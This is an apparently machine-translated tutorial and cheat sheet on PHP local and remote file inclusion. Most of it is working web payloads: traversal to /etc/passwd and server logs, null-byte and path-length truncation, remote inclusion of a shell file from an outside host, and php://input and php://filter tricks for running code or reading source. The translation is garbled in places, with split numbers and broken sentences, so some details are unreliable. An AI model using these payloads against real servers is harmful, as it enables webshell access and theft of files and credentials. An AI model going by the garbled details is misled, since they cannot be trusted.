A, PHP configuration in the file contain the use of
The file contains a vulnerability that when the programmer in the include file of the process is introduced in the external data submitted by participating in the procedures included the generation of vulnerability, this vulnerability is currently the Web attacks in the utilization of one of the highest vulnerability, an attacker can easily obtain the server's access permissions, i.e., get a webshell in. And the file contains usually have local file include, Local File Inclusion and remote file inclusion(Remote File Inclusion). allow_url_fopen and allow_url_include are decisions that belong to the local file contains LFI and remote file inclusion （RFI）conditions, in PHP4, the only one of the allow_url_fopen option. Wherein the allow_url_fopen and allow_url_include is 0n the case of remote file inclusion vulnerability, in contrast to a local file include vulnerability. The file contains two typical format is as follows: 1． Need to truncate the file contains include($_GET['sb']);
include(“$_GET['dir']/test.php”); Here you want to use the file containing it must break the back of/test. php limit, and usually truncated behind the data there are three approaches. （1）Use%0 0 to truncate Occasion: Magic_quote to off in the case
2）Use? Truncated Occasion: remote file include, RFI, equivalent to a further configuration a Get request. http://127.0.0.1:81/ include.php?dir=http://127.0.0.1:81/shell.txt?
（3）by making the path length reaches a certain length limit truncated Usually Windows the length to truncate to 2 4 0, Linux the truncated length of 4 0 9 6 Use occasions: suitable for Since Windows and Linux file name has a maximum path length(MAX_PATH)limits, therefore when submitting the file name length exceeds the maximum stiffness length limit is truncated behind the content, so as to achieve file contains the effect include.php?dir=http://127.0.0.1:81/shell.txt//////////////////////////////////////////////////////////////////////
2． Directly contains the type include(“$_GET['dir']“); Can be directly in the dir specified in the file name will be able to achieve file contains, without the need to go through the truncation process. In the register_globals to on in the case, if the variable is not initialized you can reach the file containing the effect, typically the online documentation contains a vulnerability are not the above two then directly, most require register_globals to meet in order to achieve the file contains.
The basic file contains the vulnerability: code : Contains paths the following files: ? file=. htaccess Path traversal: ? file=../../../../../../../../../var/lib/locate. db (The file is very interesting because it allows you to search the file system) * Comprises injecting the PHP code in the file: ? file=../../../../../../../../../var/log/apache/error. log (you can find other possible Apache dirs here and other ways here. Think about all possible logfiles, file uploads, session files etc.)
Limited local file inclusion: code : The null character injection(Null Byte Injection): ? file=../../../../../../../../../etc/passwd%0 0 (Requires magic_quotes_gpc=off) The column list(Null Byte Injection): ? file=../../../../../../../../../var/www/accounts/%0 0 (Only BSD, need magic_quotes_gpc=off,more information here)
Path truncation(Path Truncation): ? file=../../../../../../../../../etc/passwd.\.\.\.\.\.\.\.\.\.\.\ ... (For more information see here and here) Point number truncated: ? file=../../../../../../../../../etc/passwd................ ... (Windows only, for more details see here)
Basic remote file comprises: code : Contains a remote code(Including Remote Code): ? file=[http|https|ftp]://websec.wordpress.com/shell.txt (Require allow_url_fopen=On and allow_url_include=On) Use the php input stream(Using PHP stream php://input): ? file=php://input (specify your payload in the POST parameters, watch urlencoding, details here, requires allow_url_include=On) * Use the PHP filter function(Using PHP stream php://filter): ? file=php://filter/convert.base64-encode/resource=index.php (lets you read PHP source because it wont get evaluated in base64. More details here and here)